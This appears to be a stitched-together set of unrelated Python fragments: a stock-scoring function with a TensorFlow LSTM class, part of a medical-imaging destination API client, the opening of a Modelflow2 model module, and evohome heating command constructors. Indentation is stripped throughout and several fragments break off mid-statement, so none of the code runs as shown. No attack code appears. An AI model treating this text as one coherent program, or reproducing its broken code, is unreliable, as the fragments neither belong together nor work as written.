def score_factors(df_fundamental, size):
# 成长因子:growth_stat_ncf_of_oa_yoy
# 估值因子:asharevalue_stat_pb_mrq, asharevalue_stat_pe_ttm, asharevalue_stat_ps_ttm, asharevalue_stat_total_mv,
# ashareprofit_stat_net_sales_rate_ttm, asharedebt_stat_equity_ratio_mrq
# 打分环节
df_fundamental['score'] = 0
for i in range(len(df_fundamental)):
df = df_fundamental.iloc[i]
score = 5*(df['growth_stat_ncf_of_oa_yoy']) + \
3*(df['asharevalue_stat_pb_mrq']-df['asharevalue_stat_pe_ttm']+df['asharevalue_stat_ps_ttm']
+df['asharevalue_stat_total_mv']-df['ashareprofit_stat_net_sales_rate_ttm']-df['asharedebt_stat_equity_ratio_mrq']) + \
2*(df['profit_sq_stat_roe_one_season']+df['income_sq_stat_basic_eps']+df['income_sq_stat_net_profit']+df['income_sq_stat_overall_income']
+df['balance_stat_accrued_wages']-df['balance_stat_current_liabilities']+df['balance_stat_fixed_asset']+df['balance_stat_receivable_other']+
-df['cashflow_sq_stat_net_increase_in_cce']+df['ashareoperate_stat_account_receive_turnover_ttm']
-df['ashareoperate_stat_accounts_payable_turnover_ttm']-df['ashareoperate_stat_total_capital_turnover_ttm'])
df_fundamental.loc[i, 'score'] = score
# 按score降序排序
df_fundamental = df_fundamental.sort_values(by='score', ascending=False)
trade_stocks = list(df_fundamental['stock'][:size])
return trade_stocks
## ========== 以下为LSTM模型 ==========
class LSTM():
def __init__(self, name_scope, input_size, time_steps, batch_size=16, hidden_units = 128, learning_rate=0.01, epoches=100):
self.name_scope = name_scope
self.input_size = input_size
self.time_steps = time_steps
self.hidden_units = hidden_units
self.learning_rate = learning_rate
self.batch_size = batch_size
self.epoches = epoches
self.NetInit()
def weight_variable(self, shape):
with tf.name_scope('weights'):
return tf.Variable(tf.truncated_normal(shape, stddev=0.1), name='W')
def bias_variable(self, shape):
with tf.name_scope('biases'):
return tf.Variable(tf.constant(0.1, shape=shape))
def NetInit(self):
with tf.name_scope('Inputs'):
self.x = tf.placeholder(tf.float32, [None, self.time_steps, self.input_size], name='x_input')
self.y_ = tf.placeholder(tf.float32, [None, self.input_size], name='y_input')
weights = {
'in': self.weight_variable([self.input_size, self.hidden_units]),
'out': self.weight_variable([self.hidden_units, self.input_size])
}
biases = {
'in': self.bias_variable([self.hidden_units, ]),
'out': self.bias_variable([self.input_size, ])
}
# RNN
x = tf.reshape(self.x, [-1, self.input_size])
with tf.name_scope('Wx_plus_b'):
x_in = tf.matmul(x, weights['in']) + biases['in']
x_in = tf.reshape(x_in, [-1, self.time_steps, self.hidden_units])
# basic LSTM Cell.
cell = tf.contrib.rnn.BasicLSTMCell(self.hidden_units, forget_bias=1.0)
# lstm cell is divided into two parts (c_state, h_state)
init_state = cell.zero_state(self.batch_size, dtype=tf.float32)
outputs, final_state = tf.nn.dynamic_rnn(cell, x_in, initial_state=init_state, time_major=False, scope=self.name_scope)
self.prediction = tf.matmul(final_state[1], weights['out']) + biases['out'] # shape = (batch_size, input_size)
with tf.name_scope('loss'):
self.loss = tf.losses.mean_squared_error(labels=self.y_, predictions=self.prediction)
with tf.name_scope('train'):
self.train_op = tf.train.AdamOptimizer(self.learning_rate).minimize(self.loss)
self.sess = tf.Session()
self.sess.run(tf.local_variables_initializer())
self.sess.run(tf.global_variables_initializer())
self.saver=tf.train.Saver(max_to_keep=1)
#writer = tf.summary.FileWriter("logs/", self.sess.graph)
#self.merg_op = tf.summary.merge_all()
def handle_predict_data(self, predict_data):
predict_data = predict_data[np.newaxis, :]
return_data = predict_data
for i in range(self.batch_size-1):
return_data = np.vstack([return_data, predict_data])
return return_data # (batch_size, time_steps, input_size)
def get_batches(self, dataset):
length = dataset.shape[0]
x_batches = []
y_batches = []
for i in range(length-self.batch_size-self.time_steps-1):
batch = []
batch_label = []
for j in range(self.batch_size):
batch.append(dataset[i+j:i+j+self.time_steps])
batch_label.append(dataset[i+j+self.time_steps])
x_batches.append(batch)
y_batches.append(batch_label)
x_batches = np.array(x_batches)
y_batches = np.array(y_batches)
return x_batches, y_batches
def train(self, dataset):
min_loss = 1
for i in range(self.epoches+1):
x_batches, y_batches = self.get_batches(dataset)
assert len(x_batches) == len(y_batches)
for j in range(len(x_batches)):
train_data = x_batches[j]
train_label = y_batches[j]
self.sess.run (self.train_op, feed_dict = {self.x: train_data, self.y_: train_label})
train_loss = self.get_loss(x_batches[0], y_batches[0])
if train_loss < min_loss:
min_loss = train_loss
self.saver.save(self.sess, 'models/%s.ckpt'%(self.name_scope))
def get_loss(self, data, label):
return self.sess.run(self.loss, feed_dict={self.x: data, self.y_: label})
def predict(self, | |
not found')
errors_mapping[('NOT_PERMITTED', None)] = NotPermitted('You are not permitted to do this')
query_data = {
'api': self._api,
'url': '/destination/search/report',
'request_data': request_data,
'errors_mapping': errors_mapping,
'required_sid': True,
}
return QueryO(**query_data)
def retrieve(
self,
activity_id,
send_method,
study_request_found_id,
customfield_param=None,
):
"""Retrieve.
:param activity_id: uuid of the DESTINATION_SEARCH activity to retrieve from
:param send_method: The method to send a study as a study request response (share|duplicate)
:param study_request_found_id: UUID of a study request search results to retrieve and send as study request response
:param customfield_param: Custom field(s) will be set for the study retrieved (optional)
"""
request_data = {
'activity_id': activity_id,
'send_method': send_method,
'study_request_found_id': study_request_found_id,
}
if customfield_param is not None:
customfield_param_dict = {'{prefix}{k}'.format(prefix='customfield-', k=k): v for k,v in customfield_param.items()}
request_data.update(customfield_param_dict)
errors_mapping = {}
errors_mapping[('MISSING_FIELDS', None)] = MissingFields('A required field is missing or does not have data in it. The error_subtype holds a array of all the missing fields')
errors_mapping[('NOT_FOUND', None)] = NotFound('The activity can not be found')
query_data = {
'api': self._api,
'url': '/destination/retrieve',
'request_data': request_data,
'errors_mapping': errors_mapping,
'required_sid': True,
}
return QueryO(**query_data)
def search_mwl(
self,
study_id,
uuid,
accession_number=None,
order_date=None,
order_number=None,
patient_birth_date=None,
patient_name=None,
patient_sex=None,
patientid=None,
):
"""Search mwl.
:param study_id: The id of the study we are searching for orders for
:param uuid: uuid of the destination
:param accession_number: Accession number to find (optional)
:param order_date: Order date to find (optional)
:param order_number: Order number to find (optional)
:param patient_birth_date: Birth date to find (optional)
:param patient_name: Patient name to find (optional)
:param patient_sex: Gender to find (optional)
:param patientid: Patient id to find (optional)
"""
request_data = {
'accession_number': accession_number,
'order_date': order_date,
'order_number': order_number,
'patient_birth_date': patient_birth_date,
'patient_name': patient_name,
'patient_sex': patient_sex,
'patientid': patientid,
'study_id': study_id,
'uuid': uuid,
}
errors_mapping = {}
errors_mapping[('INSUFFICIENT_CRITERIA', None)] = InsufficientCriteria('Not enough search fields are populated')
errors_mapping[('MISSING_FIELDS', None)] = MissingFields('A required field is missing or does not have data in it. The error_subtype holds a array of all the missing fields')
errors_mapping[('NOT_FOUND', None)] = NotFound('The destination or study can not be found')
errors_mapping[('NOT_PERMITTED', None)] = NotPermitted('You are not permitted to search the destination')
errors_mapping[('NOT_SUPPORTED', None)] = NotSupported('The destination does not support searching a destination')
query_data = {
'api': self._api,
'url': '/destination/search/mwl',
'request_data': request_data,
'errors_mapping': errors_mapping,
'required_sid': True,
}
return QueryO(**query_data)
class AsyncDestination:
"""AsyncDestination."""
def __init__(self, api):
self._api = api
def list(
self,
account_id,
uuid,
node_id=None,
serial_no=None,
):
"""List.
:param account_id: uuid of the account
:param uuid: uuid of the destination
:param node_id: node_id
:param serial_no: serial_no
"""
request_data = {
'account_id': account_id,
'node_id': node_id,
'serial_no': serial_no,
'uuid': uuid,
}
errors_mapping = {}
errors_mapping[('FILTER_NOT_FOUND', None)] = FilterNotFound('The filter can not be found. The error_subtype will hold the filter UUID')
errors_mapping[('INVALID_CONDITION', None)] = InvalidCondition('The condition is not support. The error_subtype will hold the filter expression this applies to')
errors_mapping[('INVALID_FIELD', None)] = InvalidField('The field is not valid for this object. The error_subtype will hold the filter expression this applies to')
errors_mapping[('INVALID_SORT_FIELD', None)] = InvalidSortField('The field is not valid for this object. The error_subtype will hold the field name this applies to')
errors_mapping[('INVALID_SORT_ORDER', None)] = InvalidSortOrder('The sort order for the field is invalid. The error_subtype will hold the field name this applies to')
errors_mapping[('MISSING_FIELDS', None)] = MissingFields('A required field is missing or does not have data in it. The error_subtype holds a array of all the missing fields')
errors_mapping[('NOT_FOUND', None)] = NotFound('The account can not be found')
errors_mapping[('NOT_PERMITTED', None)] = NotPermitted('You are not permitted to view this list')
query_data = {
'api': self._api,
'url': '/destination/list',
'request_data': request_data,
'errors_mapping': errors_mapping,
'required_sid': True,
}
query_data['paginated_field'] = 'destinations'
return AsyncQueryOPSF(**query_data)
def add(
self,
account_id,
address,
aetitle,
distributed_destinations,
linked_destination,
linked_qr_activity_in_referred_account,
linked_qr_to_referred_account,
name,
node_id,
path,
port,
c_echo_interval=None,
c_echo_schedule=None,
can_mwl_search=None,
can_push_hl7=None,
can_query_retrieve=None,
can_retrieve_thin=None,
can_search=None,
cd_burn_info=None,
cd_burn_name=None,
cd_burn_priority=None,
default_query_retrieve_level=None,
fire_webhooks=None,
gateway_settings=None,
hl7_address=None,
hl7_fetch_filter=None,
hl7_port=None,
manual_push_roles=None,
push_related_studies=None,
sort_order=None,
sqlch_psh_if_img_unchg=None,
sqlch_psh_if_route_hl7=None,
type=None,
ui_json=None,
):
"""Add.
:param account_id: uuid of the account
:param address: Address of the destination (required if DICOM type)
:param aetitle: Aetitle of the destination (required if DICOM type)
:param distributed_destinations: A JSON array of destination ids. This list will be used to process requests in round robin manner. Meaningful for DISTRIBUTING destination type only (opional)
:param linked_destination: uuid of the destination for LINKED destinations
:param linked_qr_activity_in_referred_account: A flag to create DESTINATION_SEARCH activities in the linked destination's account. Meaningful for LINKED destinations only (opional)
:param linked_qr_to_referred_account: A flag to create resultant studies in the linked destination's account (not the account of LINKED destination where the search was initiated). Meaningful for LINKED destinations only (opional)
:param name: Name of the destination
:param node_id: uuid of the node that handles the destination
:param path: Path of the folder for a FOLDER type of destination (required if FOLDER type)
:param port: Port of the destination (required if DICOM type)
:param c_echo_interval: Interval in seconds to C echo the destination (optional)
:param c_echo_schedule: C echo schedule (optional)
:param can_mwl_search: Can this destination support searching a modality work list (optional)
:param can_push_hl7: Can this destination support pushong Hl7 messages (optional)
:param can_query_retrieve: Can this destination support query retrieve from HL7 messages (optional)
:param can_retrieve_thin: Can this destination support retrieving thin studies (optional)
:param can_search: Can this destination support searching (optional)
:param cd_burn_info: A JSON hash with the CD burning information (optional)
:param cd_burn_name: Name for the CD burner software (optional)
:param cd_burn_priority: Integer value for the burner priority (optional)
:param default_query_retrieve_level: Default query retrieve level this can be either (study|series|image) and defaults to study if not specified (optional)
:param fire_webhooks: Fire webhooks for events associated with this destination (optional)
:param gateway_settings: Gateway settings (optional)
:param hl7_address: Address of an attached HL7 destination (optional except for VIRTUAL destinations)
:param hl7_fetch_filter: A transform condition expression (see /transform/add for format) to match against the HL7 message. Only fire a query retrieve if the message matches the condition (optional)
:param hl7_port: Port of an attached HL7 destination (optional except for VIRTUAL destinations)
:param manual_push_roles: A comma separated list of role uuids, a user is required to have one of them to manually push to this destination (optional)
:param push_related_studies: Push all the related studies (same MRN/patientid) in the namespace when a study is pushed (optional)
:param sort_order: Integer value for sorting (optional)
:param sqlch_psh_if_img_unchg: Squelch pushes to the destination if the image count has not changed and the push is by a routing rule (optional)
:param sqlch_psh_if_route_hl7: Squelch pushes to the destination if the push was generated by HL7 triggered routing (optional)
:param type: Type of the destination either DICOM, FOLDER, ACCELERATOR,VIRTUAL, BURNER, XDS, LINKED, DISTRIBUTING or UPLOADER. Defaults to DICOM (optional)
:param ui_json: JSON for UI settings (optional)
"""
request_data = {
'account_id': account_id,
'address': address,
'aetitle': aetitle,
'c_echo_interval': c_echo_interval,
'c_echo_schedule': c_echo_schedule,
'can_mwl_search': can_mwl_search,
'can_push_hl7': can_push_hl7,
'can_query_retrieve': can_query_retrieve,
'can_retrieve_thin': can_retrieve_thin,
'can_search': can_search,
'cd_burn_info': cd_burn_info,
'cd_burn_name': cd_burn_name,
'cd_burn_priority': cd_burn_priority,
'default_query_retrieve_level': default_query_retrieve_level,
'distributed_destinations': distributed_destinations,
'fire_webhooks': fire_webhooks,
'gateway_settings': gateway_settings,
'hl7_address': hl7_address,
'hl7_fetch_filter': hl7_fetch_filter,
'hl7_port': hl7_port,
'linked_destination': linked_destination,
'linked_qr_activity_in_referred_account': linked_qr_activity_in_referred_account,
'linked_qr_to_referred_account': linked_qr_to_referred_account,
'manual_push_roles': manual_push_roles,
'name': name,
'node_id': node_id,
'path': path,
'port': port,
'push_related_studies': push_related_studies,
'sort_order': sort_order,
'sqlch_psh_if_img_unchg': sqlch_psh_if_img_unchg,
'sqlch_psh_if_route_hl7': sqlch_psh_if_route_hl7,
'type': type,
'ui_json': ui_json,
}
errors_mapping = {}
errors_mapping[('DUP_AETITLE', None)] = DupAetitle('Duplicate aetitle. All destinations for the same node must have a unique aetitle')
errors_mapping[('INVALID_CD_BURN_INFO', None)] = InvalidCdBurnInfo('Invalid cd_burn_info. The error_subtype holds more detail')
errors_mapping[('INVALID_DISTRIBUTED_DESTINATION', None)] = InvalidDistributedDestination('distributed_destinations configuration is invalid')
errors_mapping[('INVALID_FLAG', None)] = InvalidFlag('An invalid flag was passed. The error_subtype holds the name of the invalid flag')
errors_mapping[('INVALID_GATEWAY_TYPE', None)] = InvalidGatewayType('The type is wrong for the gateway it is getting attached to')
errors_mapping[('INVALID_INTEGER', None)] = InvalidInteger('An invalid integer was passed. The error_subtype holds the name of the invalid integer')
errors_mapping[('INVALID_NODE_TYPE', None)] = InvalidNodeType('The node is not a harvester')
errors_mapping[('INVALID_NODE_TYPE', None)] = InvalidNodeType('The node type is invalid for this type of destination')
errors_mapping[('INVALID_SCHEDULE', None)] = InvalidSchedule('The schedule is invalid. The error_subtype holds the error detail')
errors_mapping[('INVALID_TYPE', None)] = InvalidType('An invalid type was passed')
errors_mapping[('INVALID_VALUE', None)] = InvalidValue('An invalid value | |
<reponame>Freya-Antonia/Modelflow2
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 02 19:41:11 2013
This module creates model class instances.
@author: Ib
"""
import model_Excel as me
from pathlib import Path
from io import StringIO
import json
from collections import defaultdict, namedtuple
from itertools import groupby, chain, zip_longest
import re
import pandas as pd
import sys
import networkx as nx
import fnmatch
import numpy as np
from itertools import chain
from collections import Counter
import time
from contextlib import contextmanager
import os
from subprocess import run
import webbrowser as wb
import importlib
import gc
import copy
import matplotlib.pyplot as plt
import zipfile
from functools import partial,cached_property,lru_cache
from tqdm.auto import tqdm
import seaborn as sns
from IPython.display import SVG, display, Image, IFrame, HTML
import ipywidgets as ip
try:
from numba import jit, njit
except:
pass
import os
try:
import xlwings as xw
except:
...
import modelmanipulation as mp
import modelvis as mv
import modelpattern as pt
from modelnet import draw_adjacency_matrix
from modelnewton import newton_diff
import modeljupyter as mj
from modelhelp import cutout, update_var
from modelnormalize import normal
# functions used in BL language
from scipy.stats import norm
from math import isclose, sqrt, erf
from scipy.special import erfinv, ndtri
node = namedtuple('node', 'lev,parent,child')
np.seterr(all='ignore')
class BaseModel():
"""Class which defines a model from equations
In itself the BaseModel is of no use.
The **model** class enriches BaseModel with additional
Mixin classes which has additional methods and properties.
A model instance has a number of properties among which theese can be particular useful:
:allvar: Information regarding all variables
:basedf: A dataframe with first result created with this model instance
:lastdf: A dataframe with the last result created with this model instance
The two result dataframes are used for comparision and visualisation. The user can set both basedf and altdf.
"""
def __init__(self, i_eq='', modelname='testmodel', silent=False, straight=False, funks=[],
tabcomplete=True, previousbase=False, use_preorder=True, normalized=True,safeorder= True,
var_description={}, **kwargs):
''' initialize a model'''
if i_eq != '':
self.funks = funks
self.equations = i_eq if '$' in i_eq else mp.tofrml(i_eq, sep='\n')
self.name = modelname
# if True the dependency graph will not be called and calculation wil be in input sequence
self.straight = straight
self.save = True # saves the dataframe in self.basedf, self.lastdf
self.analyzemodelnew(silent) # on board the model equations
self.maxstart = 0
self.genrcolumns = []
# do we want tabcompletion (slows dovn input to large models)
self.tabcomplete = tabcomplete
# set basedf to the previous run instead of the first run
self.previousbase = previousbase
self.safeorder= safeorder
if not self.istopo or self.straight:
self.use_preorder = use_preorder # if prolog is used in sim2d
else:
self.use_preorder = False
self.keep_solutions = {}
self.set_var_description(var_description)
return
@classmethod
def from_eq(cls, equations, modelname='testmodel', silent=False, straight=False, funks=[],
params={}, tabcomplete=True, previousbase=False, normalized=True,
norm=True, sym=False, sep='\n', **kwargs):
"""
Creates a model from macro Business logic language.
That is the model specification is first exploded.
Args:
:equations: The model
:modelname: Name of the model. Defaults to 'testmodel'.
:silent: Suppress messages. Defaults to False.
:straigth: Don't reorder the model. Defaults to False.
:funks: Functions incorporated in the model specification . Defaults to [].
:params: For later use. Defaults to {}.
:tabcomplete: Allow tab compleetion in editor, for large model time consuming. Defaults to True.
:previousbase: Use previous run as basedf not the first. Defaults to False.
:norm: Normalize the model. Defaults to True.
:sym: If normalize do it symbolic. Defaults to False.
:sep: Seperate the equations. Defaults to newline '\n'.
:Returns: A model instance:
"""
udrullet = mp.explode(equations, norm=norm,
sym=sym, funks=funks, sep=sep)
pt.check_syntax_model(udrullet)
mmodel = cls(udrullet, modelname, silent=silent, straight=straight, funks=funks,
tabcomplete=tabcomplete, previousbase=previousbase, normalized=normalized, **kwargs)
mmodel.equations_original = equations
return mmodel
def get_histmodel(self):
""" return a model instance with a model which generates historic values for equations
marked by a frml name I or IDENT """
hist_eq = mp.find_hist_model(self.equations)
return type(self)(hist_eq, funks=self.funks)
def analyzemodelnew(self, silent):
''' Analyze a model
The function creats:**Self.allvar** is a dictory with an entry for every variable in the model
the key is the variable name.
For each endogeneous variable there is a directory with thees keys:
:maxlag: The max lag for this variable
:maxlead: The max Lead for this variable
:endo: 1 if the variable is endogeneous (ie on the left hand side of =
:frml: String with the formular for this variable
:frmlnumber: The number of the formular
:varnr: Number of this variable
:terms: The frml for this variable translated to terms
:frmlname: The frmlname for this variable
:startnr: Start of this variable in gauss seidel solutio vector :Advanced:
:matrix: This lhs element is a matrix
:dropfrml: If this frml shoud be excluded from the evaluation.
In addition theese properties will be created:
:endogene: Set of endogeneous variable in the model
:exogene: Se exogeneous variable in the model
:maxnavlen: The longest variable name
:blank: An emty string which can contain the longest variable name
:solveorder: The order in which the model is solved - initaly the order of the equations in the model
'''
gc.disable()
mega = pt.model_parse(self.equations, self.funks)
termswithvar = {t for (f, nt) in mega for t in nt if t.var}
# varnames = list({t.var for t in termswithvar})
termswithlag = sorted([(t.var, '0' if t.lag == '' else t.lag)
for t in termswithvar], key=lambda x: x[0]) # sorted by varname and lag
groupedvars = groupby(termswithlag, key=lambda x: x[0])
varmaxlag = {varandlags[0]: (
min([int(t[1]) for t in list(varandlags[1])])) for varandlags in groupedvars}
groupedvars = groupby(termswithlag, key=lambda x: x[0])
varmaxlead = {varandlags[0]: (
max([int(t[1]) for t in list(varandlags[1])])) for varandlags in groupedvars}
# self.maxlag = min(varmaxlag[v] for v in varmaxlag.keys())
self.maxlag = min(v for k, v in varmaxlag.items())
self.maxlead = max(v for k, v in varmaxlead.items())
self.allvar = {name: {
'maxlag': varmaxlag[name],
'maxlead': varmaxlead[name],
'matrix': 0,
# 'startnr' : 0,
'endo': 0} for name in {t.var for t in termswithvar}}
# self.aequalterm = ('','','=','','') # this is how a term with = looks like
# this is how a term with = looks like
self.aequalterm = ('', '=', '', '')
for frmlnumber, ((frml, fr, n, udtryk), nt) in enumerate(mega):
# find the position of =
assigpos = nt.index(self.aequalterm)
# variables to the left of the =
zendovar = [t.var for t in nt[:assigpos] if t.var]
# do this formular define a matrix on the left of =
boolmatrix = pt.kw_frml_name(n, 'MATRIX')
for pos, endo in enumerate(zendovar):
if self.allvar[endo]['endo']:
print(' **** On the left hand side several times: ', endo)
self.allvar[endo]['dropfrml'] = (1 <= pos)
self.allvar[endo]['endo'] = 1
self.allvar[endo]['frmlnumber'] = frmlnumber
self.allvar[endo]['frml'] = frml
self.allvar[endo]['terms'] = nt[:]
self.allvar[endo]['frmlname'] = n
self.allvar[endo]['matrix'] = boolmatrix
self.allvar[endo]['assigpos'] = assigpos
# finished looping over all the equations
self.endogene = {
x for x in self.allvar.keys() if self.allvar[x]['endo']}
self.exogene = {
x for x in self.allvar.keys() if not self.allvar[x]['endo']}
self.exogene_true = {
v for v in self.exogene if not v+'___RES' in self.endogene}
# breakpoint()
self.normalized = not all((v.endswith('___RES')
for v in self.endogene))
self.endogene_true = self.endogene if self.normalized else {
v for v in self.exogene if v+'___RES' in self.endogene}
# # the order as in the equations
# for iz, a in enumerate(sorted(self.allvar)):
# self.allvar[a]['varnr'] = iz
self.v_nr = sorted([(v, self.allvar[v]['frmlnumber'])
for v in self.endogene], key=lambda x: x[1])
self.nrorder = [v[0] for v in self.v_nr]
if self.straight: # no sequencing
self.istopo = False
self.solveorder = self.nrorder
else:
try:
self.topo = list(nx.topological_sort(self.endograph))
self.solveorder = self.topo
self.istopo = True
self.solveorder = self.topo
# check if there is formulars with several left hand side variables
# this is a little tricky
dropvar = [(v, self.topo.index(v), self.allvar[v]['frmlnumber']) for v in self.topo
if self.allvar[v]['dropfrml']] # all dropped vars and their index in topo and frmlnumber
if len(dropvar):
# all multi-lhs formulars
multiendofrml = {frmlnr for (
var, toposort, frmlnr) in dropvar}
dropthisvar = [v for v in self.endogene # theese should also be droppen, now all are dropped
if self.allvar[v]['frmlnumber'] in multiendofrml
and not self.allvar[v]['dropfrml']]
for var in dropthisvar:
self.allvar[var]['dropfrml'] = True
# now find the first lhs variable in the topo for each formulars. They have to be not dropped
# this means that they should be evaluated first
keepthisvarnr = [min([topoindex for | |
is not None and not isinstance(active, (bool, int)):
raise TypeError(f"Invalid args: active={active}, but must be an bool")
until, duration = _normalise_until(mode, active, until, duration)
payload = "".join(
(
"00",
"01" if bool(active) else "00",
mode,
"FFFFFF" if duration is None else f"{duration:06X}",
"" if until is None else dtm_to_hex(until),
)
)
return cls(W_, _1F41, payload, ctl_id, **kwargs)
@classmethod # constructor for RQ/10A0
@validate_api_params()
def get_dhw_params(cls, ctl_id: str, **kwargs):
"""Constructor to get the params of the DHW (c.f. parser_10a0)."""
return cls(RQ, _10A0, "00", ctl_id, **kwargs)
@classmethod # constructor for W_/10A0
@validate_api_params()
def set_dhw_params(
cls,
ctl_id: str,
setpoint: float = 50.0,
overrun: int = 5,
differential: int = 1,
**kwargs,
):
"""Constructor to set the params of the DHW (c.f. parser_10a0)."""
# Defaults for newer evohome colour:
# Defaults for older evohome colour: ?? (30-85) C, ? (0-10) min, ? (1-10) C
# Defaults for evohome monochrome:
# 14:34:26.734 022 W --- 18:013393 01:145038 --:------ 10A0 006 000F6E050064
# 14:34:26.751 073 I --- 01:145038 --:------ 01:145038 10A0 006 000F6E0003E8
# 14:34:26.764 074 I --- 01:145038 18:013393 --:------ 10A0 006 000F6E0003E8
setpoint = 50.0 if setpoint is None else setpoint
overrun = 5 if overrun is None else overrun
differential = 1.0 if differential is None else differential
assert 30.0 <= setpoint <= 85.0, setpoint
assert 0 <= overrun <= 10, overrun
assert 1 <= differential <= 10, differential
payload = f"00{temp_to_hex(setpoint)}{overrun:02X}{temp_to_hex(differential)}"
return cls(W_, _10A0, payload, ctl_id, **kwargs)
@classmethod # constructor for RQ/1260
@validate_api_params()
def get_dhw_temp(cls, ctl_id: str, **kwargs):
"""Constructor to get the temperature of the DHW sensor (c.f. parser_10a0)."""
return cls(RQ, _1260, "00", ctl_id, **kwargs)
@classmethod # constructor for RQ/1030
@validate_api_params(has_zone=True)
def get_mix_valve_params(cls, ctl_id: str, zone_idx: Union[int, str], **kwargs):
"""Constructor to get the mix valve params of a zone (c.f. parser_1030)."""
return cls(RQ, _1030, f"{zone_idx:02X}00", ctl_id, **kwargs) # TODO: needs 00?
@classmethod # constructor for W/1030
@validate_api_params(has_zone=True)
def set_mix_valve_params(
cls,
ctl_id: str,
zone_idx: Union[int, str],
max_flow_setpoint=55,
min_flow_setpoint=15,
valve_run_time=150,
pump_run_time=15,
**kwargs,
):
"""Constructor to set the mix valve params of a zone (c.f. parser_1030)."""
assert 0 <= max_flow_setpoint <= 99, max_flow_setpoint
assert 0 <= min_flow_setpoint <= 50, min_flow_setpoint
assert 0 <= valve_run_time <= 240, valve_run_time
assert 0 <= pump_run_time <= 99, pump_run_time
payload = "".join(
(
f"{zone_idx:02X}",
f"C801{max_flow_setpoint:02X}",
f"C901{min_flow_setpoint:02X}",
f"CA01{valve_run_time:02X}",
f"CB01{pump_run_time:02X}",
f"CC01{1:02X}",
)
)
return cls(W_, _1030, payload, ctl_id, **kwargs)
@classmethod # constructor for RQ/3220
@validate_api_params()
def get_opentherm_data(cls, dev_id: str, msg_id: Union[int, str], **kwargs):
"""Constructor to get (Read-Data) opentherm msg value (c.f. parser_3220)."""
msg_id = msg_id if isinstance(msg_id, int) else int(msg_id, 16)
payload = f"0080{msg_id:02X}0000" if parity(msg_id) else f"0000{msg_id:02X}0000"
return cls(RQ, _3220, payload, dev_id, **kwargs)
@classmethod # constructor for RQ/0008
@validate_api_params() # has_zone=Optional
def get_relay_demand(cls, dev_id: str, zone_idx: Union[int, str] = None, **kwargs):
"""Constructor to get the demand of a relay/zone (c.f. parser_0008)."""
payload = "00" if zone_idx is None else f"{zone_idx:02X}"
return cls(RQ, _0008, payload, dev_id, **kwargs)
@classmethod # constructor for RQ/0404
@validate_api_params(has_zone=True)
def get_schedule_fragment(
cls,
ctl_id: str,
zone_idx: Union[int, str],
frag_idx: int,
frag_cnt: int,
**kwargs,
):
"""Constructor to get a schedule fragment (c.f. parser_0404).
Usually a zone, but will be the DHW schedule if zone_idx == 0xFA, 'FA', or 'HW'.
"""
header = "00230008" if zone_idx == 0xFA else f"{zone_idx:02X}200008"
frag_length = 0
payload = f"{header}{frag_length:02X}{frag_idx + 1:02X}{frag_cnt:02X}"
return cls(RQ, _0404, payload, ctl_id, **kwargs)
@classmethod # constructor for RQ/0100
@validate_api_params()
def get_system_language(cls, ctl_id: str, **kwargs):
"""Constructor to get the language of a system (c.f. parser_0100)."""
return cls(RQ, _0100, "00", ctl_id, **kwargs)
@classmethod # constructor for RQ/0418
@validate_api_params()
def get_system_log_entry(cls, ctl_id: str, log_idx: int, **kwargs):
"""Constructor to get a log entry from a system (c.f. parser_0418)."""
log_idx = log_idx if isinstance(log_idx, int) else int(log_idx, 16)
return cls(RQ, _0418, f"{log_idx:06X}", ctl_id, **kwargs)
@classmethod # constructor for RQ/2E04
@validate_api_params()
def get_system_mode(cls, ctl_id: str, **kwargs):
"""Constructor to get the mode of a system (c.f. parser_2e04)."""
return cls(RQ, _2E04, "FF", ctl_id, **kwargs)
@classmethod # constructor for W/2E04
@validate_api_params()
def set_system_mode(cls, ctl_id: str, system_mode, until=None, **kwargs):
"""Constructor to set/reset the mode of a system (c.f. parser_2e04)."""
if system_mode is None:
raise ValueError("Invalid args: system_mode cant be None")
system_mode = SYSTEM_MODE._hex(
f"{system_mode:02X}" if isinstance(system_mode, int) else system_mode
) # may raise KeyError
if until is not None and system_mode in (
SYSTEM_MODE.auto,
SYSTEM_MODE.auto_with_reset,
SYSTEM_MODE.heat_off,
):
raise ValueError(
f"Invalid args: For system_mode={SYSTEM_MODE._str(system_mode)},"
" until must be None"
)
payload = "".join(
(
system_mode,
dtm_to_hex(until),
"00" if until is None else "01",
)
)
return cls(W_, _2E04, payload, ctl_id, **kwargs)
@classmethod # constructor for RQ/313F
@validate_api_params()
def get_system_time(cls, ctl_id: str, **kwargs):
"""Constructor to get the datetime of a system (c.f. parser_313f)."""
return cls(RQ, _313F, "00", ctl_id, **kwargs)
@classmethod # constructor for W/313F
@validate_api_params()
def set_system_time(cls, ctl_id: str, datetime, **kwargs):
"""Constructor to set the datetime of a system (c.f. parser_313f)."""
# W --- 30:185469 01:037519 --:------ 313F 009 0060003A0C1B0107E5
return cls(W_, _313F, f"006000{dtm_to_hex(datetime)}", ctl_id, **kwargs)
@classmethod # constructor for RQ/1100
@validate_api_params()
def get_tpi_params(cls, dev_id: str, domain_id=None, **kwargs):
"""Constructor to get the TPI params of a system (c.f. parser_1100)."""
if domain_id is None:
domain_id = "00" if dev_id[:2] == "13" else "FC"
return cls(RQ, _1100, domain_id, dev_id, **kwargs)
@classmethod # constructor for W/1100
@validate_api_params()
def set_tpi_params(
cls,
ctl_id: str,
domain_id: str,
cycle_rate=3, # TODO: check
min_on_time=5, # TODO: check
min_off_time=5, # TODO: check
proportional_band_width=None, # TODO: check
**kwargs,
):
"""Constructor to set the TPI params of a system (c.f. parser_1100)."""
assert cycle_rate is None or cycle_rate in (3, 6, 9, 12), cycle_rate
assert min_on_time is None or 1 <= min_on_time <= 5, min_on_time
assert min_off_time is None or 1 <= min_off_time <= 5, min_off_time
assert (
proportional_band_width is None or 1.5 <= proportional_band_width <= 3.0
), proportional_band_width
payload = "".join(
(
f"{domain_id:02X}" if isinstance(domain_id, int) else domain_id,
f"{cycle_rate * 4:02X}",
f"{int(min_on_time * 4):02X}",
f"{int(min_off_time * 4):02X}FF",
f"{temp_to_hex(proportional_band_width)}01",
)
)
return cls(W_, _1100, payload, ctl_id, **kwargs)
@classmethod # constructor for RQ/000A
@validate_api_params(has_zone=True)
def get_zone_config(cls, ctl_id: str, zone_idx: Union[int, str], **kwargs):
"""Constructor to get the config of a zone (c.f. parser_000a)."""
return cls(RQ, _000A, f"{zone_idx:02X}00", ctl_id, **kwargs) # TODO: needs 00?
@classmethod # constructor for W/000A
@validate_api_params(has_zone=True)
def set_zone_config(
cls,
ctl_id: str,
zone_idx: Union[int, str],
min_temp=5,
max_temp=35,
local_override: bool = False,
